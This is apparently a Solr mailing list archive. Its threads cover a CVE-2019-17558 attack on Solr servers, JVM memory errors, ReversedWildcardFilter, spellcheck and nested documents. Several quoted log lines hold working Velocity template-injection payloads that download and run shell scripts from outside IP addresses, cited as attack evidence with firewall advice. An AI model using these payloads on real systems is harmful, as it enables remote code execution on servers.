Re: CVE-2019-17558 on SOLR 6.1

2021-02-13 Thread TK Solr

(Resending to the list. Sorry, Rick.)

FYI, my client was using 8.3.1, which should have mitigated the attack.
But the server was suffering a sudden death of the Solr process, and the log 
showed it was being attacked using CVE-2019-17558.


We blocked the external access of Solr API. Then this sudden death ended. So I 
tend to think just disabling the Velocity engine might not enough.


Of course there is a possibility that this server was also getting a different 
kind of attack. We don't know.

But in general, the Solr port should be closed from external access.

TK

On 2/12/21 10:17 AM, Rick Tham wrote:

We are using Solr 6.1 and at the moment we can not upgrade due to
application dependencies.

We have mitigation steps in place to only trust specific machines within
our DMZ.

I am trying to figure out if the following is an additioanal valid
mitigation step for CVE-2019-17558 on SOLR 6.1. None of our solrconfig.xml
contains the lib references to the velocity jar files as follows:


l

It doesn't appear that you can add these jars references using the config
API. Without these references, you are not able to flip the
params.resource.loader.enabled to true using the config API. If you are not
able to flip the flag and none of your cores have these lib references then
is the risk present?

Thanks in advance!



Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Oops, I should have referenced this document rather:

https://www.tenable.com/cve/CVE-2019-17558 
<https://www.tenable.com/cve/CVE-2019-17558>


On 2/3/21 2:42 PM, TK Solr wrote:

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability 



If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:


webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*} 
status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) 
[c:sitecore_submittals_index s:shard1 r:core_node1 
x:sitecore_submittals_index_shard1_replica3] o.a.s.c.PluginBag Going to 
create a new queryResponseWriter with {type = queryResponseWriter,name = 
velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args 
= 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's 
Solr node has been running for 4 weeks so far.  I think this security hole 
doesn't just leak the information but it can also kill the Solr process.


TK





Re: SolrCloud keeps crashing

2021-02-03 Thread TK Solr

Victor & Satish,

Is your Solr accessible from the Internet by anyone? If so, your site is being 
attacked by a bot using this security hole:


https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

If that is the case, try blocking the Solr port from the Internet.

My client's Solr was experiencing the sudden death syndrome. In the log, there 
were strange queries very similar to what you have here:



webapp=/solr path=/select 
params={*q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec($str.valueOf('bash,-c,wget+-q+-O+-+http://193.122.159.179/f.sh+|bash').split(",")))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity*}
 status=400 QTime=1
2020-12-20 08:49:07.029 INFO  (qtp401424608-8687) [c:sitecore_submittals_index 
s:shard1 r:core_node1 x:sitecore_submittals_index_shard1_replica3] 
o.a.s.c.PluginBag Going to create a new queryResponseWriter with {type = 
queryResponseWriter,name = velocity,class = 
solr.VelocityResponseWriter,attributes = {startup=lazy, name=velocity, 
class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}


We configured the firewall to block the Solr port. After that, my client's Solr 
node has been running for 4 weeks so far.  I think this security hole doesn't 
just leak the information but it can also kill the Solr process.


TK




Re: "Failed to reserve shared memory."

2021-01-07 Thread TK Solr

I added these lines to solr.in.sh and restarted Solr:

 GC_TUNE=('-XX:+UseG1GC' \
   '-XX:+PerfDisableSharedMem' \
   '-XX:+ParallelRefProcEnabled' \
   '-XX:MaxGCPauseMillis=250' \
   '-XX:+AlwaysPreTouch' \
   '-XX:+ExplicitGCInvokesConcurrent')

According to the Admin UI, -XX:+UseLargePage is gone, which is good but all 
other -XX:* except -XX:+UseG1GC are also gone.


What is the correct way to remove just -XX:UseLargePage ?

TK

On 1/6/21 3:42 PM, TK Solr wrote:
My client is having a sudden death syndrome of Solr 8.3.1. Solr stops 
responding suddenly and they have to restart Solr.
(It is not clear if the Solr/jetty process was dead or alive but not 
responding. The OOM log isn't found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er 



which suggests removal of the JVM option -XX:+UseLargePage, which is added by 
bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not 
quite sure what kind of variable GC_TUNE is. It is used as in:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with *${*GC_TUNES*+x}* and*($*GC_TUNE*)* syntax. Is this a 
special kind of environmental variable?



TK






Re: The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr
Please disregard my previous post. I understand these are actual error messages, 
not the errors of handling Admin UI.


I think this server is being attacked using the vulnerability described here

https://www.tenable.com/blog/cve-2019-17558-apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability

Fortunately the attack isn't succeeding because of SOLR-13971 fix, and instead 
it is causing these errors. I'll fortify the Solr access.


On 1/7/21 11:02 AM, TK Solr wrote:
On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:


Time(Local)  Level  Core Logger    Message
1/7/2021 ERROR  x:mycore loader    ResourceManager: 
unable to find resource 'custom.vm' in any resource loader.

8:41:46 AM   false
    1/7/2021 ERROR x:mycore    HttpSolrCall 
null:java.io.IOException: Unable to find resource 'custom.vm'

8:41:46 AM   false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

...

Are these errors from the Admin UI code itself? Does the Admin UI use 
Velocity? (I thought it might be a library path issue but I don't see 
'custom.vm' anywhere in the Solr source code.)



What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

The Solr I'm using is 8.3.1 using openJDK 11 on Ubuntu 18.04.3.

TK





The x: prefix for the core name and 'custom.vm' errors in Admin UI's Logging tab

2021-01-07 Thread TK Solr

On the Admin UI's login screen, when the Logging tab is clicked, I see lines 
like:

Time(Local)  Level  Core    Logger    
Message
1/7/2021 ERROR  x:mycoreloader
ResourceManager: unable to find resource 'custom.vm' in any resource loader.
8:41:46 AM   false

1/7/2021 ERROR  x:mycoreHttpSolrCall  null:java.io.IOException: Unable to find resource 'custom.vm'

8:41:46 AM   false



If I click on the info icon (circled "i"), this is displayed.

null:java.io.IOException: Unable to find resource 'custom.vm'
at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
...

Are these errors from the Admin UI code itself? Does the Admin UI use Velocity? 
(I thought it might be a library path issue but I don't see 'custom.vm' 
anywhere in the Solr source code.)


What does "x:" prefix to the core name mean?
What does "false" under the log level mean?

The Solr I'm using is 8.3.1 using openJDK 11 on Ubuntu 18.04.3.

TK




"Failed to reserve shared memory."

2021-01-06 Thread TK Solr
My client is having a sudden death syndrome of Solr 8.3.1. Solr stops responding 
suddenly and they have to restart Solr.
(It is not clear if the Solr/jetty process was dead or alive but not responding. 
The OOM log isn't found.)


In the Solr start up log, these three error messages were found:

OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 1)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)
OpenJDK 64-Bit Server VM warning: Failed to reserve shared memory. (error = 12)

I am wondering if anyone has seen these errors.


I found this article

https://stackoverflow.com/questions/45968433/java-hotspottm-64-bit-server-vm-warning-failed-to-reserve-shared-memory-er

which suggests removal of the JVM option -XX:+UseLargePage, which is added by 
bin/solr script if GC_TUNE is not defined. Would that be a good idea? I'm not 
quite sure what kind of variable GC_TUNE is. It is used as in:


  if [ -z ${GC_TUNE+x} ]; then
...

    '-XX:+AlwaysPreTouch')
  else
    GC_TUNE=($GC_TUNE)
  fi

I'm not familiar with *${*GC_TUNES*+x}* and*($*GC_TUNE*)* syntax. Is this a 
special kind of environmental variable?



TK





Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

It doesn't tell much:

"debug":{ "rawquerystring":"email:*@aol.com", "querystring":"email:*@aol.com", 
"parsedquery":"(email:*@aol.com)", "parsedquery_toString":"email:*@aol.com", 
"explain":{ "11d6e092-58b5-4c1b-83bc-f3b37e0797fd":{ "match":true, "value":1.0, 
"description":"email:*@aol.com"},


The email field uses ReversedWildcardFilter for both indexing and query.

On 4/15/20 12:04 PM, Erick Erickson wrote:

What do you see if you add =query? That should tell you….

Best,
Erick


On Apr 15, 2020, at 2:40 PM, TK Solr  wrote:

Thank you.

Is there any harm if I use it on the query side too? In my case it seems working OK (even 
with withOriginal="false"), and even faster.
I see the query parser code is taking a look at index analyzer and applying 
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses 
ReversedWildcardFilter.

On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
reverse the normal token as well as the reversed token.


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with the index-time only use of ReversedWildcardFilter and
the
both time use.

My result shows using ReverseWildcardFilter both times runs twice as fast
but my
dataset is not very large (in the order of 10k docs), so I'm not sure if I
can
make a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown in ReversedWildcardFilter
<

https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>


in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the

filter

is used only for indexing.







maxPosQuestion="2"

maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>










Is it incorrect to use the same analyzer for query like?








maxPosQuestion="0"

maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>



In the description of filter, I see "Tokens without wildcards are not

reversed."

But the wildcard appears only in the query string. How can
ReversedWildcardFilter know if the wildcard is being used
if the filter is used only at the indexing time?

TK






Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-15 Thread TK Solr

Thank you.

Is there any harm if I use it on the query side too? In my case it seems working 
OK (even with withOriginal="false"), and even faster.
I see the query parser code is taking a look at index analyzer and applying 
ReversedWildcardFilter at query time. But I didn't
quite understand what happens if the query analyzer also uses 
ReversedWildcardFilter.


On 4/15/20 1:51 AM, Colvin Cowie wrote:

You only need apply it in the index analyzer:
https://lucene.apache.org/solr/8_4_0/solr-core/org/apache/solr/analysis/ReversedWildcardFilterFactory.html
If it appears in the index analyzer, the query part of it is automatically
applied at query time.

The ReversedWildcardFilter indexes *every* token in reverse, with a special
character at the start ('\u0001' I believe) to avoid false positive matches
when the query term isn't reversed (e.g. if the term being indexed is mar,
then the reversed token would be \u0001ram, so a search for 'ram' wouldn't
accidentally match that). If *withOriginal* is set to true then it will
reverse the normal token as well as the reversed token.


On Thu, 9 Apr 2020 at 02:27, TK Solr  wrote:


I experimented with the index-time only use of ReversedWildcardFilter and
the
both time use.

My result shows using ReverseWildcardFilter both times runs twice as fast
but my
dataset is not very large (in the order of 10k docs), so I'm not sure if I
can
make a conclusion.

On 4/8/20 2:49 PM, TK Solr wrote:

In the usage example shown in ReversedWildcardFilter
<

https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter>


in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the

filter

is used only for indexing.







maxPosQuestion="2"

maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>










Is it incorrect to use the same analyzer for query like?








maxPosQuestion="0"

maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>



In the description of filter, I see "Tokens without wildcards are not

reversed."

But the wildcard appears only in the query string. How can
ReversedWildcardFilter know if the wildcard is being used
if the filter is used only at the indexing time?

TK




Re: ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
I experimented with the index-time only use of ReversedWildcardFilter and the 
both time use.


My result shows using ReverseWildcardFilter both times runs twice as fast but my 
dataset is not very large (in the order of 10k docs), so I'm not sure if I can 
make a conclusion.


On 4/8/20 2:49 PM, TK Solr wrote:
In the usage example shown in ReversedWildcardFilter 
<https://lucene.apache.org/solr/guide/8_3/filter-descriptions.html#reversed-wildcard-filter> 
in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the filter 
is used only for indexing.


  positionIncrementGap="100">

    
  
  ignoreCase="true"/>

  
  maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>

    
    
  
  ignoreCase="true" synonyms="synonyms.txt"/>
  ignoreCase="true"/>

  
    
  


Is it incorrect to use the same analyzer for query like?

  positionIncrementGap="100">

    
    
  
  
  maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>

    
  

In the description of filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can 
ReversedWildcardFilter know if the wildcard is being used

if the filter is used only at the indexing time?

TK




ReversedWildcardFilter - should it be applied only at the index time?

2020-04-08 Thread TK Solr
In the usage example shown in ReversedWildcardFilter 
 
in Solr Ref Guide,
and only usage find in managed-schema to define text_general_rev, the filter is 
used only for indexing.


  positionIncrementGap="100">

    
  
  ignoreCase="true"/>

  
  maxFractionAsterisk="0.33" maxPosAsterisk="3" withOriginal="true"/>

    
    
  
  ignoreCase="true" synonyms="synonyms.txt"/>
  ignoreCase="true"/>

  
    
  


Is it incorrect to use the same analyzer for query like?

  positionIncrementGap="100">

    
    
  
  
  maxFractionAsterisk="0" maxPosAsterisk="100" withOriginal="false"/>

    
  

In the description of filter, I see "Tokens without wildcards are not reversed."
But the wildcard appears only in the query string. How can 
ReversedWildcardFilter know if the wildcard is being used

if the filter is used only at the indexing time?

TK




Re: Spellcheck on specified fields?

2020-04-07 Thread TK Solr
Correction. "mark seattle" query doesn't show suggestions since "mark" alone has 
some hits.
It is when the same logic is used for a single term query of "seatle" that 3 
suggestions of "seattle"

are returned. Do I have to identify the field by using startOffset value?

On 4/7/20 3:46 PM, TK Solr wrote:

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)=true

The raw query terms are distributed to all fields because I don't know what 
term is intended to for which field.


If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard exact numbers. It's from more complicated query of the same 
nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field keeps a phone number and spelling corrections are not 
very useful,
I would like the spellchecker to skip this and similar fields but I don't see 
a relevant

parameter in spellchecker's documentation. Is there any way to specify the
fields I am interested or I am not interested?

TK





Spellcheck on specified fields?

2020-04-07 Thread TK Solr

I query on multiple field like:

q=city:(mark seattle) name:(mark seattle) phone:(mark seattle)=true

The raw query terms are distributed to all fields because I don't know what term 
is intended to for which field.


If I misspell seattle, I get 3 suggestions:

"spellcheck":{
    "suggestions":[
  "seatle",{
    "numFound":1,
    "startOffset":29,
    "endOffset":35,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":50,
    "endOffset":56,
    "suggestion":["seattle"]},
  "seatle",{
    "numFound":1,
    "startOffset":73,
    "endOffset":79,
    "suggestion":["seattle"]}]}}

(Please disregard exact numbers. It's from more complicated query of the same 
nature.)


I think it's showing a correction suggestion for each query field.

Since the phone field keeps a phone number and spelling corrections are not very 
useful,
I would like the spellchecker to skip this and similar fields but I don't see a 
relevant

parameter in spellchecker's documentation. Is there any way to specify the
fields I am interested or I am not interested?

TK





Proper way to manage managed-schema file

2020-04-06 Thread TK Solr
I am using Solr 8.3.1 in non-SolrCloud mode (what should I call this mode?) and 
modifying managed-schema.


I noticed that Solr does override this file wiping out all my comments and 
rearranging the order. I noticed there is a "DO NOT EDIT" comment. Then, what is 
the proper/expected way to manage this file? Admin UI can add fields but cannot 
edit existing one or add new field types. Do I keep a script of many schema 
calls? (Then how do I reset the default to the initial one, which would be 
needed before re-re-playing the schema calls.)


TK




Re: Admin UI core loading fails

2020-04-06 Thread TK Solr
I failed to include this line in my first post. This /select call with strange 
parameters (q=1) seems to be happening periodically even when I don't do any 
operation on Admin UI. I scanned the Solr source code, /opt/solr and 
/var/solr/data and I couldn't find the source of this call.


2020-04-04 00:41:02.604 INFO (qtp231311211-24) [   x:my_core] o.a.s.c.S.Request 
[my_core] webapp=/solr path=/select 
params={*q=1*=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+217.12.209.234/s.sh'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} 
hits=0 status=0 QTime=1



On 4/2/20 12:50 AM, TK Solr wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was 
reported. But the newly added field type is not shown in the core's Analyzer 
section.


I selected Logging from the side bar, I saw errors like this for every core, 
not just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


I restarted Solr, the core was loaded without an error and I can see the newly 
added filed type.


What could be the cause of these errors that only happens with the Reload 
button?

TK




Re: Admin UI core loading fails

2020-04-02 Thread TK Solr


On 4/2/20 5:39 AM, Erick Erickson wrote:

What do your Solr logs show? My bet is that your mods to the configs somehow 
caused the reload to fail too early in the process to be shown in the UI.


These are the lines in solr.log that I see lead to the stack trace (core name 
has been modified to my_core). I don't understand why Velocity is involved. Is 
it used by Admin UI?


2020-04-02 02:16:33.851 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.h.SolrConfigHandler Executed config commands successfully and persited to 
File System [{"update-queryresponsewriter":{

    "startup":"lazy",
    "name":"velocity",
    "class":"solr.VelocityResponseWriter",
    "template.base.dir":"",
    "solr.resource.loader.enabled":"true",
    "params.resource.loader.enabled":"true"}}]
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/config params={} status=0 QTime=487
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.SolrCore 
[my_core]  CLOSING SolrCore org.apache.solr.core.SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.SolrMetricManager Closing metric reporters for 
registry=solr.core.my_core, tag=SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.r.SolrJmxReporter Closing reporter 
[org.apache.solr.metrics.reporters.SolrJmxReporter@2f090079: rootName = null, 
domain = solr.core.my_core, service url = null, agent id = null] for registry 
solr.core.my_core / com.codahale.metrics.MetricRegistry@4125989a
2020-04-02 02:16:33.858 INFO (searcherExecutor-29-thread-1-processing-x:my_core) 
[   x:my_core] o.a.s.c.SolrCore [my_core] Registered new searcher 
Searcher@45a874aa[my_core] 
main{ExitableDirectoryReader(UninvertingDirectoryReader(Uninverting(_0(8.3.1):C55967:[diagnostics={java.vendor=Ubuntu, 
os=Linux, java.version=11.0.6, 
java.vm.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, lucene.version=8.3.1, 
os.arch=amd64, java.runtime.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, 
source=flush, os.version=4.15.0-76-generic, 
timestamp=1585790971495}]:[attributes={Lucene50StoredFieldsFormat.mode=BEST_SPEED}])))}
2020-04-02 02:16:34.105 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/select 
params={q=1=custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('rm+-rf+/tmp/zzz'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end=velocity} 
hits=0 status=0 QTime=1
2020-04-02 02:16:34.106 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.PluginBag 
Going to create a new queryResponseWriter with {type = queryResponseWriter,name 
= velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] o.a.v.loader 
ResourceManager: unable to find resource 'custom.vm' in any resource loader.
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] 
o.a.s.s.HttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm'




Best,
Erick


On Apr 2, 2020, at 02:50, TK Solr  wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.

I selected Logging from the side bar, I saw errors like this for every core, 
not just the core I tried to reload.

null:java.io.IOException: Unable to find resource 'custom.vm'
 at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
 at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
 at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
 at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
 at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
 at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
 at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandle

Admin UI core loading fails

2020-04-02 Thread TK Solr

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by clicking 
Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.


I selected Logging from the side bar, I saw errors like this for every core, not 
just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


I restarted Solr, the core was loaded without an error and I can see the newly 
added filed type.


What could be the cause of these errors that only happens with the Reload 
button?

TK




Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

Ah, that's what _root_ is for ! I was wondering.

Thank you!


On 7/25/18 2:36 PM, Mikhail Khludnev wrote:

_root_:parent-id

чт, 26 июля 2018, 1:33 TK Solr :


The child doc transformer worked great. Thank you.

In my experiment, posting 'parent-id' to the
update
end point only deleted the parent doc. Do I insert a complex join query
from id
to _version_ and delete all the docs of the matching _version_ ?


On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children

be

deleted also? Or do I have to have a parent_id field in each child so

that the

child docs can be deleted?


On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]


https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory

or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser


talks about {!parent which=}


child
docs>, which returns parent docs only, and
{!child of=} 
docs>,

which
returns child docs only.

Is there a way to retrieve the matched documents in the original,

nested

form?
Using the sample document, is there way to get:


 1
 Solr has block join support
 parentDocument
 
 2
 SolrCloud supports it too!
 


rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

The child doc transformer worked great. Thank you.

In my experiment, posting 'parent-id' to the update 
end point only deleted the parent doc. Do I insert a complex join query from id 
to _version_ and delete all the docs of the matching _version_ ?



On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory 


or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


